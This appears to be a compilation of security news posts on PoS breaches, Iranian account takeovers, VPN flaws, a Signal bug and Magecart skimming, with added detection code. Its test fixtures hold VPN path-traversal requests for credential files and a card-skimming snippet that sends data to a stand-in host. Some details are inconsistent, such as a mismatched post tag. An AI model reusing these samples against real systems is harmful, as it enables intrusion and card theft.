The three restaurant chains reported that the PoS malware was discovered only at certain locations, and at most locations it was present for only a few weeks in July.

The brands did not reveal the number of impacted customers.

Customers were initially alerted about the incident on August 20, when the restaurant chains were investigating the security incidents.

The PoS malware was designed to capture data from the magnetic stripe of a payment card during the payment process, including the card number, expiration date, and internal verification code, and sometimes the cardholder name.
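The fields listed above are exactly what the magnetic stripe's track 1 and track 2 carry, which is why egress monitoring and DLP tools look for track-formatted data leaving a PoS network. The following is an added example of that check, not code from any of the affected brands: it matches the standard track layouts in a buffer (an outbound request body here) and uses a Luhn check to drop false positives, reporting only a masked PAN. The buffer is constructed and the card number is the well-known 4111 1111 1111 1111 test number, not a real card.

```python
"""Find magnetic-stripe track data in a byte buffer and report masked hits.
Added example on a constructed buffer."""
import re

# Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})(\d{3})([^?]*)\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})([^?]*)\?")


def luhn_ok(pan: str) -> bool:
    """Mod-10 check: doubles every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Keep only the last four digits so the alert itself is not cardholder data."""
    return "*" * (len(pan) - 4) + pan[-4:]


def find_track_data(buf: bytes) -> list:
    """Return a dict per Luhn-valid track match; no full PAN ever leaves this function."""
    hits = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"track": 1, "pan": mask(pan), "expiry": m.group(3).decode(),
                         "name": m.group(2).decode(errors="replace")})
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"track": 2, "pan": mask(pan), "expiry": m.group(3).decode()})
    return hits


# Constructed outbound request body; 4111... is a test PAN, the third record fails Luhn.
SAMPLE_BUFFER = (
    b"POST /upload HTTP/1.1\r\nHost: 203.0.113.55\r\n\r\n"
    b"%B4111111111111111^DOE/JANE^25121011000000000?"
    b";4111111111111111=25121011000000000?"
    b";1234567890123456=25121010000000000?"
)

if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_BUFFER):
        print(hit)
```

The same matcher works on process memory captured from a terminal during incident response, which is how RAM-scraper infections are usually confirmed; in either use the Luhn filter is what keeps the alert volume manageable on binary data that happens to contain long digit runs.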

The fourth brand that suffered a payment card breach is Hy-Vee; the restaurant chain provided an update to the notice of the payment card data incident released on August 14.

The company confirmed that on July 29 crooks compromised some payment processing systems; in this case, the PoS malware remained active for more than a month.

The update provided by the company revealed that infections at the fuel pumps began on December 14, 2018, while payment systems at restaurants and drive-thru coffee shops were infected starting January 15.

“The specific timeframes when data from cards used at these locations involved may have been accessed vary by location over the general timeframe beginning December 14, 2018, to July 29, 2019 for fuel pumps and beginning January 15, 2019, to July 29, 2019, for restaurants and drive-thru coffee shops.” reads the update provided by the company. “There are six locations where access to card data may have started as early as November 9, 2018, and one location where access to card data may have continued through August 2, 2019.”

The company also published a Location Look Up Tool to determine the Hy-Vee impacted locations.

Pierluigi Paganini

(SecurityAffairs – restaurant chains, PoS malware)


Iran-linked Phosphorus group hit a 2020 presidential campaign

Microsoft says that the Iran-linked cyber-espionage group tracked as Phosphorus (aka APT35, Charming Kitten, Newscaster, and Ajax Security Team) hit a 2020 presidential campaign.

Microsoft’s Threat Intelligence Center (MSTIC) revealed that an Iran-linked APT group tracked as Phosphorus (aka APT35, Charming Kitten, Newscaster, and Ajax Security Team) attempted to access email accounts belonging to current and former US government officials, journalists, Iranians living abroad, and individuals involved in a 2020 US presidential campaign.

The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011.

The experts revealed that the recent campaign carried out by the APT group took place between August and September.

“In a 30-day period between August and September, the Microsoft Threat Intelligence Center (MSTIC) observed Phosphorus making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.” reads the analysis published by Microsoft. “The targeted accounts are associated with a U.S. presidential campaign, current and former U.S. government officials, journalists covering global politics and prominent Iranians living outside Iran.”

The state-sponsored hackers initially conducted a reconnaissance operation to identify high-value targets. Microsoft observed more than 2,700 probes, then the attackers targeted 241 accounts, some of them associated with a U.S. Presidential campaign.

Microsoft confirmed that hackers breached four accounts, but the compromised accounts were not associated with the U.S. Presidential campaign or current and former U.S. government officials.

Microsoft notified all the impacted users about the hacks and provided support to the victims to secure their accounts.

The hackers first broke into the secondary email inbox associated with the victim’s Microsoft account, then used it to request a password reset. Once the reset link arrived in the secondary inbox, the hackers used it to take control of the primary Microsoft account.

“Phosphorus used information gathered from researching their targets or other means to game password reset or account recovery features and attempt to take over some targeted accounts.” continues the report. “For example, they would seek access to a secondary email account linked to a user’s Microsoft account, then attempt to gain access to a user’s Microsoft account through verification sent to the secondary account. In some instances, they gathered phone numbers belonging to their targets and used them to assist in authenticating password resets.”

Microsoft experts pointed out that the attacks attributed to the Phosphorus group, even if not technically sophisticated, used a significant amount of personal information to identify the targets’ accounts and hijack them.

Microsoft recommends that its high-profile customers involved in political campaigns, think tanks, or NGOs sign up for Microsoft AccountGuard, which offers additional protection against such attacks.

“There are currently 60,000 accounts in 26 countries protected by AccountGuard, which provides monitoring and unified threat notification across the Office 365 accounts you use for work and the personal accounts of your staff and others affiliated with your organization that opt-in for this protection.” concludes Microsoft. “To date, we’ve made more than 800 notifications of attempted nation-state attacks to AccountGuard customers.”

In March, Microsoft announced that it had taken control of 99 domains used by an Iran-linked APT group tracked by the company as Phosphorus.

The domains attempted to mimic legitimate services belonging to Microsoft and other legitimate online services, such as LinkedIn and Yahoo. The list of seized domains includes verification-live.com, outlook-verify.net, myaccount-services.net, verify-linkedin.net, and yahoo-verify.net.

The threat actors used the websites to serve malware to the victims; they also sent out emails alerting recipients of a security risk in order to trick them into handing over their account credentials.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)


Security Affairs newsletter Round 234

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folks, let me inform you that I have suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Once again thank you!

Hacker claims to have stolen over 218M Zynga ‘Words with Friends’ gamers records

Masad Stealer Malware exfiltrates data via Telegram

Phishers continue to abuse Adobe and Google Open Redirects

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

A new critical flaw in Exim exposes email servers to remote attacks

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/AirDropBot

Iran’s oil minister orders ‘Full Alert’ for oil sector against attacks

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

A new Adwind variant involved in attacks on US petroleum industry


Danish company Demant expects to incur losses of up to $95 Million after cyber attack

Frequent VBA Macros used in Office Malware

Gucci IOT Bot Discovered Targeting European Region

Hackers breached one of Comodo Forums, 245,000 users impacted

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

Teheran: U.S. has started ‘Cyber War’ against Iran

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Asics apologizes after pornography ran on screens at central store in Auckland for hours

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Experts found 20 Million tax records for Russian citizens exposed online

Former American Express employee under investigation for customers data abuse

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

Zendesk 2016 security breach may impact Uber, Slack, and other organizations

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Dutch police shut down bulletproof service hosting tens of DDoS botnets

FBI warns about high-impact Ransomware attacks on U.S. Organizations

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

Egypt regularly spies on opponents and activists with mobile apps

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

The sLoad Threat: Ten Months Later

Magecart hackers are expanding their operations

NSA Launches New Cybersecurity Directorate

 

Pierluigi Paganini

(SecurityAffairs – newsletter)


UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities

The UK’s National Cyber Security Centre (NCSC) warns of attacks exploiting recently disclosed VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure products.

According to the UK’s National Cyber Security Centre (NCSC), advanced persistent threat (APT) groups have been exploiting recently disclosed vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure products to break into target networks.

This week the NCSC issued an alert to warn organizations using the vulnerable products.

“The NCSC is investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities affecting Virtual Private Network (VPN) products from vendors Pulse Secure, Palo Alto and Fortinet.” reads the alert issued by the NCSC.

“This activity is ongoing, targeting both UK and international organisations. Affected sectors include government, military, academic, business and healthcare,”

The UK agency reported that APT groups target several vulnerabilities: CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, CVE-2018-13379, CVE-2018-13382 and CVE-2018-13383 in Fortinet FortiOS, and CVE-2019-1579 in Palo Alto Networks GlobalProtect.

CVE-2018-13379 is a pre-authentication path traversal in the FortiOS SSL VPN web portal that lets an unauthenticated attacker download FortiOS system files; among them is the SSL VPN session file, which holds user and administrator credentials in plain text.

CVE-2019-11510 in Pulse Connect Secure is a critical, pre-authentication arbitrary file read, while CVE-2019-11539 is a post-authentication command injection in the same product. CVE-2018-13382 (an unauthenticated password change through the FortiOS SSL VPN portal) and CVE-2018-13383 (a heap overflow in the same portal) complete the Fortinet set, and CVE-2019-1579 is a format string bug in the GlobalProtect portal.

The vulnerabilities were first detailed in July by researchers Orange Tsai and Meh Chang from DEVCORE, who found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents.

“Users of these VPN products should investigate their logs for evidence of compromise, especially if it is possible that patches were not applied immediately after their release.” concludes the NCSC.

“Apart from specific product advice below, administrators should also look for evidence of compromised accounts in active use, such as anomalous IP locations or times.

Snort rules are available in open source, but may not pick up events for exploits over HTTPS.”
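The NCSC’s advice is to go back through the appliance logs for evidence of exploitation. As an added example (not from the NCSC alert or from the vendors), the script below hunts web access logs for the traversal pattern behind CVE-2018-13379 and CVE-2019-11510: it percent-decodes each request twice, checks whether the path or any query-parameter value climbs above the web root, and flags references to sensitive files. The sample log lines are constructed; the request shapes and the “sslvpn_websession” file name are taken from public write-ups of these bugs and are assumptions to tune for your own appliances.

```python
"""Hunt for path-traversal attempts against SSL VPN portals in web access
logs. Added example; the log lines below are constructed."""
import re
from urllib.parse import unquote

# File names the traversal bugs discussed above were reported to expose
# (assumption: taken from public write-ups, tune for your own appliances).
SENSITIVE_FILES = ("sslvpn_websession", "/etc/passwd", "/etc/shadow")

# Combined Log Format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def escapes_root(path):
    """True if the dot-segments in `path` climb above the directory it started in."""
    depth = 0
    for seg in re.sub(r"/+", "/", path).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def analyze_request(target):
    """Return the reasons a request target looks like a traversal attempt."""
    decoded = target
    for _ in range(2):            # undo double percent-encoding as well
        decoded = unquote(decoded)
    decoded = decoded.replace("\\", "/")
    path, _, query = decoded.partition("?")
    # CVE-2018-13379-style requests carry the traversal in a query parameter,
    # so check every parameter value as well as the path itself.
    candidates = [path] + [p.partition("=")[2] or p for p in query.split("&") if p]
    reasons = []
    if any(escapes_root(c) for c in candidates):
        reasons.append("traversal escapes root")
    hits = [f for f in SENSITIVE_FILES if f in decoded]
    if hits:
        reasons.append("sensitive file: " + ", ".join(hits))
    return reasons


def scan_log(lines):
    """Findings for every parsable line whose target looks malicious."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m["target"])
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                             "status": m["status"], "size": m["size"], "reasons": reasons})
    return findings


# Constructed sample: two exploitation shapes (Pulse Secure and FortiOS, as
# described in public reports), a double-encoded probe, and benign traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Oct/2019:10:02:11 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
203.0.113.9 - - [03/Oct/2019:10:02:13 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1983
203.0.113.9 - - [03/Oct/2019:10:02:15 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 200192
192.0.2.44 - - [03/Oct/2019:10:03:01 +0000] "GET /remote/fgt_lang?lang=en HTTP/1.1" 200 3100
192.0.2.44 - - [03/Oct/2019:10:03:05 +0000] "GET /images/..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 310
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["ts"], f["ip"], f["status"], f["target"], "->", "; ".join(f["reasons"]))
```

A flagged request answered with 200 and a non-trivial response size is the one to treat as a confirmed file read; a 404 still tells you who was probing and when. The NCSC notes that the Snort rules may not see exploitation over HTTPS; the appliance’s own access log records the decrypted request, which is why log review is the more reliable check.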

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities appeared first on Security Affairs.

Hacker is auctioning a database containing details of 92 million Brazilians

A database containing details of 92 million Brazilians was auctioned by a threat actor on underground forums along with a search service focused on Brazilians.

Someone is auctioning on several restricted underground forums a database containing personal information of 92 million Brazilian citizens. The threat actor, registered as X4Crow, is also advertising a search service that allows retrieving detailed information on Brazilian citizens.

[Image source: Bleeping Computer]

The records are arranged by state and include names, dates of birth and taxpayer IDs (CPF, Cadastro de Pessoas Físicas), as well as taxpayer details of legal entities (CNPJ, Cadastro Nacional da Pessoa Jurídica).

The starting price of the auction is $15,000, and participants can raise their bids in increments of $1,000.

“A post on one of the forums seen by BleepingComputer informs that the database is 16GB large, in SQL format. The starting price for the auction is $15,000 with a step up bid of $1,000.” reported Bleeping computer.

BleepingComputer, which received a sample of the database, reports that the data appears to be authentic.

At the time of writing, it seems that the seller has not received any bid.

X4Crow also advertises a search service that allows retrieving detailed information on Brazilians (i.e. Email address, profession, education level, possible relatives, neighbors, license plates, vehicle, ID card, driver’s license) simply providing a full name, taxpayer ID, or phone number.

“There is no guarantee that all the details will be retrieved for all individuals but the report may provide, on average, 80% of the specifics listed above.” continues BleepingComputer.

Querying the service to retrieve data on a specific company and its corporate structure could cost up to $150.

According to BleepingComputer, X4Crow enjoys a good reputation in the cybercrime underground even though the actor has been active only for a short time.

Pierluigi Paganini

(SecurityAffairs – Brazilians, cybercrime)

The post Hacker is auctioning a database containing details of 92 million Brazilians appeared first on Security Affairs.

A bug in Signal for Android could be exploited to spy on users

Researcher discovered a logical flaw in the Signal messaging app for Android that could be exploited by a malicious caller to force a call to be answered at the receiver’s end without interaction.

Google Project Zero white-hat hacker Natalie Silvanovich discovered a logical vulnerability in the Signal messaging app for Android that could be exploited by a malicious caller to force a call to be answered at the receiver’s end without requiring his interaction.

This means that the attacker could listen in on the receiver through the microphone of the receiver’s device.

The flaw affects audio calls only, because the user must manually enable video in every call. The attacker simply places a call to the victim and, while the victim’s device is still ringing and before anyone has tapped “accept,” sends the signalling message that would normally come back from an accepting callee.

The logical vulnerability resides in the handleCallConnected method, which could be abused to cause the call to be answered even though the user has not interacted with the device.

“In the Android client, there is a method handleCallConnected that causes the call to finish connecting. During normal use, it is called in two situations: when the device accepts the call when the user selects ‘accept,’ and when the device receives an incoming “connect” message indicating that the callee has accepted the call,” reads the analysis published by Silvanovich. “Using a modified client, it is possible to send the “connect” message to a callee device when an incoming call is in progress but has not yet been accepted by the user. This causes the call to be answered, even though the user has not interacted with the device.”

Silvanovich explained that the iOS client is affected by a similar logical issue, but the call is not established due to an error in the UI caused by the unexpected sequence of states.

Silvanovich shared her findings with the Signal security team last week, and the team fixed the issue the same day with the release of version 4.47.7.
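The bug is a state-machine problem: a message that should only be meaningful to the caller was also honoured by a callee that was still ringing. The toy model below, an added example rather than Signal’s code, reproduces that with a vulnerable and a hardened variant; the state names and the strict check are assumptions that mirror the quoted analysis, not the actual fix shipped in 4.47.7.

```python
"""Toy model of the call-signalling logic behind the Signal Android bug
described above. Added example, not Signal's code; the message and state
names are assumptions chosen to mirror the quoted analysis."""
from enum import Enum, auto


class State(Enum):
    IDLE = auto()
    OUTGOING_RINGING = auto()   # we placed a call and wait for the callee to accept
    INCOMING_RINGING = auto()   # someone is calling us; the user has not answered
    CONNECTED = auto()          # media (microphone) is live


class CallDevice:
    def __init__(self, strict):
        self.strict = strict        # False = behaviour of the vulnerable client
        self.state = State.IDLE
        self.mic_open = False
        self.outbox = []            # messages this device would send to the peer
        self.log = []

    def place_call(self):
        self.state = State.OUTGOING_RINGING
        self.outbox.append("offer")

    def receive_offer(self):
        self.state = State.INCOMING_RINGING

    def user_accept(self):
        # The user tapped "accept": connect locally and tell the caller.
        if self.state is State.INCOMING_RINGING:
            self.outbox.append("connect")
            self._handle_call_connected("user tapped accept")

    def receive_connect(self):
        # A "connect" message only makes sense on the caller side, after the
        # callee accepted. The vulnerable client ran handleCallConnected
        # regardless of state, so a callee that was still ringing got answered.
        if self.strict and self.state is not State.OUTGOING_RINGING:
            self.log.append("dropped 'connect' in state " + self.state.name)
            return
        self._handle_call_connected("peer sent connect")

    def _handle_call_connected(self, why):
        self.state = State.CONNECTED
        self.mic_open = True
        self.log.append("connected: " + why)


def forced_answer_attack(strict):
    """Attacker calls the victim and immediately sends 'connect' while it rings."""
    victim = CallDevice(strict)
    victim.receive_offer()          # phone starts ringing, nobody has touched it
    victim.receive_connect()        # message a modified caller client sends early
    return victim


def legitimate_call(strict):
    """Normal flow: caller offers, callee accepts, caller receives connect."""
    caller, callee = CallDevice(strict), CallDevice(strict)
    caller.place_call()
    callee.receive_offer()
    callee.user_accept()
    if "connect" in callee.outbox:
        caller.receive_connect()
    return caller, callee


if __name__ == "__main__":
    v = forced_answer_attack(strict=False)
    print("vulnerable client:", v.state.name, "mic_open =", v.mic_open)
    v = forced_answer_attack(strict=True)
    print("hardened client:  ", v.state.name, "mic_open =", v.mic_open)
```

The general lesson is the one to take from the model: every signalling message needs an explicit table of the states in which it is valid, and anything arriving out of that table is dropped and logged rather than handled. The same check would also have blocked the iOS variant, which only failed by accident of a UI error.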

Pierluigi Paganini

(SecurityAffairs – Signal, hacking)

The post A bug in Signal for Android could be exploited to spy on users appeared first on Security Affairs.

Magecart hackers are expanding their operations

Cybercrime gangs under the Magecart umbrella continue to compromise e-commerce platforms to steal payment card data from users worldwide.

Hacker groups under the Magecart umbrella continue to steal payment card data with so-called software skimmers injected into the checkout pages of their targets. Security firms have monitored the activities of at least a dozen groups, some going back to 2010.

According to a joint report published by RiskIQ and Flashpoint, some groups are more advanced than others; in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, MyPillow, Amerisleep, and Feedify.

Millions of Magecart instances have been detected over time, and security experts have catalogued dozens of distinct skimming scripts.

In a report recently published by RiskIQ, experts estimate that the groups have impacted millions of users. RiskIQ counts a total of 2,086,529 Magecart detections, most of them supply-chain attacks in which the skimmer enters through a third-party script rather than through the victim’s own code.

“Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites” states the report.

The Magecart group tracked as MG5 (Group 5) appears to be the most sophisticated and prolific. MG5 focuses on supply-chain attacks and is responsible for the compromise of hundreds of websites through providers such as SociaPlus and Inbenta.

In June the gang made the headlines again after infecting over 17,000 domains by targeting misconfigured, publicly writable Amazon S3 buckets.

Recently, IBM researchers observed Group 5 testing malicious code designed to inject skimmers through commercial-grade layer 7 (L7) routers.

According to RiskIQ, many groups under the umbrella still focus on e-commerce sites running the Magento or OpenCart platforms.

Following a pattern common in the criminal community, Magecart groups exploit vulnerabilities that victims have yet to patch, even when security updates have already been released by Magento and other software vendors.

Attackers also look for new vectors to distribute their skimmers, such as compromising creative ad script tags so that digital ad networks deliver the skimmer to thousands of sites at once.

The RiskIQ report revealed that 17% of all the malicious advertisements it has analyzed are associated with Magecart groups.

Below other interesting insights included in the report:

  • 17% of all Malvertisements detected by RiskIQ contain Magecart skimmers
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely.
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts.
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that’s gone offline to assume access to these breached sites. 

The full report, containing additional insights and information, is available for download here: https://www.riskiq.com/research/magecart-growing-threat/
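Most of the report’s numbers come down to third-party code executing on the payment page. As an added example (not from RiskIQ or from the report), the script below audits a checkout page’s script tags: anything not on a first-party allowlist is flagged when it lacks a Subresource Integrity hash, is loaded without HTTPS, or comes from an S3 bucket, and inline scripts that both read card fields and call an outbound primitive are reported. The sample HTML, the allowlist, the S3 host name and the SRI digest are constructed assumptions.

```python
"""Audit the scripts of a checkout page for the supply-chain exposure the
report describes: third-party hosts, scripts pulled from cloud storage,
missing Subresource Integrity, and inline code that reads card fields and
ships them elsewhere. Added example; page HTML and allowlist are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY_HOSTS = {"shop.example", "cdn.shop.example"}   # assumed allowlist
CARD_FIELDS = ("cc_number", "cardnumber", "cvv", "cvc", "expir")
EXFIL_CALLS = ("XMLHttpRequest", "fetch(", "new Image", "sendBeacon", ".src =", ".src=")


class ScriptCollector(HTMLParser):
    """Separates <script src=...> tags from inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append(a)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_page(html, first_party=FIRST_PARTY_HOSTS):
    """Return a list of findings; an empty list means nothing to look at."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for a in p.external:
        src = a["src"]
        u = urlparse(src)
        host = (u.hostname or "").lower()
        if host in first_party:
            continue
        problems = []
        if not a.get("integrity"):
            problems.append("third-party script without SRI integrity hash")
        if u.scheme and u.scheme != "https":
            problems.append("not loaded over https")
        if host.endswith(".amazonaws.com"):
            problems.append("served from S3; verify the bucket is not world-writable")
        if problems:
            findings.append({"kind": "external", "src": src, "problems": problems})
    for body in p.inline:
        low = body.lower()
        reads_card = any(f in low for f in CARD_FIELDS)
        exfil = any(c.lower() in low for c in EXFIL_CALLS)
        if reads_card and exfil:
            findings.append({"kind": "inline", "src": body.strip()[:60],
                             "problems": ["inline script reads card fields and sends data out"]})
    return findings


# Constructed checkout page: one first-party script, one pinned third-party
# script (placeholder digest), one unpinned S3-hosted script, and an inline
# skimmer-shaped handler.
SAMPLE_HTML = """
<html><head>
<script src="https://cdn.shop.example/app.js"></script>
<script src="https://tagmanager.example.net/t.js"
        integrity="sha384-PLACEHOLDERDIGEST" crossorigin="anonymous"></script>
<script src="https://assets-prod.s3.amazonaws.com/widget.js"></script>
</head><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = btoa(document.getElementsByName('cc_number')[0].value + '|' +
               document.getElementsByName('cvv')[0].value);
  new Image().src = 'https://collect.example.org/g?d=' + d;
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE_HTML):
        print(f["kind"], f["src"], "->", "; ".join(f["problems"]))
```

SRI only helps for scripts that never change, which rules out most tag managers and analytics loaders; for those, the allowlist plus a Content Security Policy that restricts connect-src and img-src is the control that actually stops exfiltration. The inline heuristic is a triage aid for a page snapshot, not a detector, since a skimmer can obfuscate both the field names and the outbound call.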

Pierluigi Paganini

(SecurityAffairs – software skimmers, hacking)

The post Magecart hackers are expanding their operations appeared first on Security Affairs.

NSA Launches New Cybersecurity Directorate

NSA is redefining its cybersecurity mission and with the Cybersecurity Directorate it will enhance its partnerships with unclassified collaboration and information sharing.

The NSA announced the new Cybersecurity Directorate — which will help defend domestic organizations from foreign cyberattacks — in a short press release. The NSA, sometimes called by its nickname, “No Such Agency,” is known for being secretive. But this new directorate seems to signal a pivot towards a more public approach to security than the Agency has taken in the past.


The directorate also reflects a change in the importance of national cybersecurity and provides a hint as to how government agencies are rethinking how cybersecurity divisions should be organized.

The NSA Makes Cyberdefense a Top Priority

The directorate will unify the NSA’s current foreign intelligence and cyberdefense operations, bringing them together in a “major organization” designed to defend domestic organizations against foreign cyberattacks. The NSA expects the directorate to “reinvigorate NSA’s white hat mission” by seeing the Agency turn towards providing partners and “customers” with threat information, and by otherwise equipping them against cyberattacks.

The directorate will also focus the NSA’s efforts on securing the military and the defense industrial base. A short NSA-produced video at the end of the press release says more about the threats the NSA expects to defend the public from, including attacks on infrastructure, theft of classified information, and “mass deception of the public.”

The pivot comes at a time where the nation is facing several security crises and reasonable fears that almost anything that runs on a computer — banks, voting machines, and critical infrastructure — can be compromised or damaged by cyberattacks.

The launch of the new directorate — and the focus of the press release on cyberdefense — follows comments made by Glenn Gerstell, chief counsel of the NSA, back in September. At that time, Gerstell said that the NSA wouldn’t “hack back” in the case of a cyberattack and that the Agency was instead focused on defending key information and infrastructure from theft or damage by foreign actors.

The directorate is not the Agency’s first foray into providing private domestic organizations with intel about foreign hackers. In 2011, as the financial sector was still recovering from the financial crisis of 2008, the Agency began providing Wall Street banks with cybersecurity information in the hopes that it would prevent “financial sabotage.”

The State of Cybersecurity

The directorate reflects a broader change that’s also being seen in the private sector. Cybersecurity is no longer seen as a sub-component of an overall security plan, or as part of the tech department, but as a necessary investment that requires top talent and serious commitment of resources. Networks are more likely to be considered vulnerable and need better defense from cyberattacks.

Businesses are increasingly relying on Internet of Things or “smart” devices to provide data. But these devices are often improperly secured and allow an access point to secure networks, and the valuable information held there. As the world becomes more connected, there are more opportunities for hackers to slip in between the cracks of cyberdefenses and do damage once they have access to secure networks.

In the press release, the NSA said that the Agency will “invest in and rely on its expert workforce.” It’s not clear right now if the new directorate will result in the NSA expanding its cybersecurity workforce. If so, they may run into some of the problems faced by the private sector, in that the number of cybersecurity experts has not kept pace with the frequency of, intensity of, and damage done by cyberattacks.

What the NSA’s Directorate Means for Cybersecurity

The new directorate shows that cybersecurity is a higher priority than ever for the Agency, and signals a turn to more public involvement in national security. Time will tell how effective the directorate is at preventing or reducing the harm of cyberattacks, but the defense industry is likely happy to receive any help it can get.

Going forward, cybersecurity will continue to become more important as critical infrastructure and essential components of our economy and national defense become more connected. Whether or not the cybersecurity industry will be able to keep up with the rising pace of attacks remains to be seen.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, NSA Cybersecurity Directorate)

The post NSA Launches New Cybersecurity Directorate appeared first on Security Affairs.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) is the protagonist of an increasing and persistent wave of attacks against Italian organizations.

Introduction

SLoad (TH-163) has been the protagonist of increasing and persistent attack waves against Italy since Q3 2018 and throughout 2019 (e.g. N020419, N040619, N010819), and has also hit the UK and Canada, as reported by Proofpoint. Ten months ago we wrote about the complex infection chain sLoad was using in its campaigns; today we look at how the threat has evolved by dissecting one of its latest attacks.

During our CSDC monitoring operations we recently noticed some changes in the infamous sLoad attack waves, which are known for a complex infection chain used to deliver additional malware. For this reason, Cybaze-Yoroi ZLAB dissected one of the latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered through legitimate certified email accounts (PEC, Posta Elettronica Certificata). These recent waves targeted Italian organizations and consultants affiliated with professional associations, such as lawyers and civil engineers. Once again, the attachment is a malicious zip archive.

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip archive does not hide PowerShell code, unlike the code appended to the archive tail recovered in past waves. The archive contains two files: a corrupted PDF and a VBScript. The PDF is a decoy designed to deceive the unaware user into running the script.

In the following tables are shown some basic information about samples contained in the zip archive.

Hash: 30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat: .vbs dropper
Brief Description: sLoad Visual Basic Script loader
Ssdeep: 192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash: 43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat: .pdf file
Brief Description: sLoad corrupted PDF file
